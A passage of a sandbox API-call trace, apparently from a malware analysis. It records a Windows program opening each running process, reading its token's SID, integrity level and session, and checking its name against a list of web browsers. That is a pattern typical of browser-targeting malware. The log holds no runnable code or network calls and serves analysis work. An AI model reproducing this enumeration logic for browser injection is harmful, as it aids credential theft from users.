[3]=0x0, [4]=0x68))) returned 0x1c [0232.990] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0232.990] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0232.990] GetLastError () returned 0x7a [0232.990] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0232.991] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0232.991] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0232.991] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0232.991] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0232.991] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0232.991] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0232.991] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0232.991] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0232.991] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x548 [0232.991] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0232.991] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0232.991] GetLastError () returned 0x7a [0232.991] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0232.991] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0232.992] CloseHandle (hObject=0x340) returned 1 [0232.992] CloseHandle (hObject=0x548) returned 1 [0232.992] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0232.992] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0232.992] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0232.992] GetLastError () returned 0x7a [0232.992] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0232.992] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0232.992] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0232.992] lstrcmpiW (lpString1="firefox.exe", lpString2="undertake.exe") returned -1 [0232.992] lstrcmpiW (lpString1="chrome.exe", lpString2="undertake.exe") returned -1 [0232.992] lstrcmpiW (lpString1="opera.exe", lpString2="undertake.exe") returned -1 [0232.992] lstrcmpiW (lpString1="iexplore.exe", lpString2="undertake.exe") returned -1 [0232.992] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="undertake.exe") returned -1 [0232.992] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="undertake.exe") returned -1 [0232.992] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x548 [0232.992] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0232.993] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0232.993] GetLastError () returned 0x7a [0232.993] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0232.993] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0232.993] CloseHandle (hObject=0x340) returned 1 [0232.993] CloseHandle (hObject=0x548) returned 1 [0232.993] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0232.993] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0232.993] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0232.993] GetLastError () returned 0x7a [0232.993] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0232.993] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0232.993] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0232.993] lstrcmpiW (lpString1="firefox.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0232.994] lstrcmpiW (lpString1="chrome.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0232.994] lstrcmpiW (lpString1="opera.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0232.994] lstrcmpiW (lpString1="iexplore.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0232.994] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0232.994] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0232.994] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x548 [0232.994] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0232.994] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0232.994] GetLastError () returned 0x7a [0232.994] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0232.994] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0232.994] CloseHandle (hObject=0x340) returned 1 [0232.994] CloseHandle (hObject=0x548) returned 1 [0232.994] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0232.994] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0232.994] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0232.994] GetLastError () returned 0x7a [0232.994] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0232.995] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0232.995] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0232.995] lstrcmpiW (lpString1="firefox.exe", lpString2="devon stickers.exe") returned 1 [0232.995] lstrcmpiW (lpString1="chrome.exe", lpString2="devon stickers.exe") returned -1 [0232.995] lstrcmpiW (lpString1="opera.exe", lpString2="devon stickers.exe") returned 1 [0232.995] lstrcmpiW (lpString1="iexplore.exe", lpString2="devon stickers.exe") returned 1 [0232.995] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="devon stickers.exe") returned 1 [0232.995] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="devon stickers.exe") returned 1 [0232.995] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x548 [0232.995] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0232.995] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0232.995] GetLastError () returned 0x7a [0232.995] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0232.995] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0232.995] CloseHandle (hObject=0x340) returned 1 [0232.995] CloseHandle (hObject=0x548) returned 1 [0232.995] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0232.995] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0232.996] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0232.996] GetLastError () returned 0x7a [0232.996] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0232.996] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0232.996] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0232.996] lstrcmpiW (lpString1="firefox.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0232.996] lstrcmpiW (lpString1="chrome.exe", lpString2="eagles_podcast_type_marker.exe") returned -1 [0232.996] lstrcmpiW (lpString1="opera.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0232.996] lstrcmpiW (lpString1="iexplore.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0232.996] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0232.996] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0232.996] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f4) returned 0x548 [0232.996] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0232.996] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0232.996] GetLastError () returned 0x7a [0232.996] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0232.996] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0232.996] CloseHandle (hObject=0x340) returned 1 [0232.997] CloseHandle (hObject=0x548) returned 1 [0232.997] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0232.997] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0232.997] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0232.997] GetLastError () returned 0x7a [0232.997] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0232.997] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0232.997] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0232.997] lstrcmpiW (lpString1="firefox.exe", lpString2="groups.exe") returned -1 [0232.997] lstrcmpiW (lpString1="chrome.exe", lpString2="groups.exe") returned -1 [0232.997] lstrcmpiW (lpString1="opera.exe", lpString2="groups.exe") returned 1 [0232.997] lstrcmpiW (lpString1="iexplore.exe", lpString2="groups.exe") returned 1 [0232.997] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="groups.exe") returned 1 [0232.997] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="groups.exe") returned 1 [0232.997] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x810) returned 0x548 [0232.997] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0232.997] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0232.997] GetLastError () returned 0x7a [0232.997] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0232.997] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0232.997] CloseHandle (hObject=0x340) returned 1 [0232.998] CloseHandle (hObject=0x548) returned 1 [0232.998] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0232.998] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0232.998] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0232.998] GetLastError () returned 0x7a [0232.998] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0232.998] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0232.998] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0232.998] lstrcmpiW (lpString1="firefox.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0232.998] lstrcmpiW (lpString1="chrome.exe", lpString2="filesdetectedlosebenjamin.exe") returned -1 [0232.998] lstrcmpiW (lpString1="opera.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0232.998] lstrcmpiW (lpString1="iexplore.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0232.998] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0232.998] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0232.998] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x820) returned 0x548 [0232.998] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0232.998] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0232.998] GetLastError () returned 0x7a [0232.998] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0232.998] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0232.998] CloseHandle (hObject=0x340) returned 1 [0232.998] CloseHandle (hObject=0x548) returned 1 [0232.999] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0232.999] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0232.999] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0232.999] GetLastError () returned 0x7a [0232.999] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0232.999] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0232.999] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0232.999] lstrcmpiW (lpString1="firefox.exe", lpString2="cincinnati consumers se.exe") returned 1 [0232.999] lstrcmpiW (lpString1="chrome.exe", lpString2="cincinnati consumers se.exe") returned -1 [0232.999] lstrcmpiW (lpString1="opera.exe", lpString2="cincinnati consumers se.exe") returned 1 [0232.999] lstrcmpiW (lpString1="iexplore.exe", lpString2="cincinnati consumers se.exe") returned 1 [0232.999] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="cincinnati consumers se.exe") returned 1 [0232.999] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="cincinnati consumers se.exe") returned 1 [0232.999] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x838) returned 0x548 [0232.999] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0232.999] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0232.999] GetLastError () returned 0x7a [0232.999] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0232.999] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0232.999] CloseHandle (hObject=0x340) returned 1 [0232.999] CloseHandle (hObject=0x548) returned 1 [0233.000] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0233.000] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0233.000] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0233.000] GetLastError () returned 0x7a [0233.000] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0233.000] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0233.000] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0233.000] lstrcmpiW (lpString1="firefox.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0233.000] lstrcmpiW (lpString1="chrome.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0233.000] lstrcmpiW (lpString1="opera.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0233.000] lstrcmpiW (lpString1="iexplore.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0233.000] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0233.000] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0233.000] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x848) returned 0x548 [0233.000] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0233.000] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0233.000] GetLastError () returned 0x7a [0233.000] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0233.000] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0233.000] CloseHandle (hObject=0x340) returned 1 [0233.000] CloseHandle (hObject=0x548) returned 1 [0233.000] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, 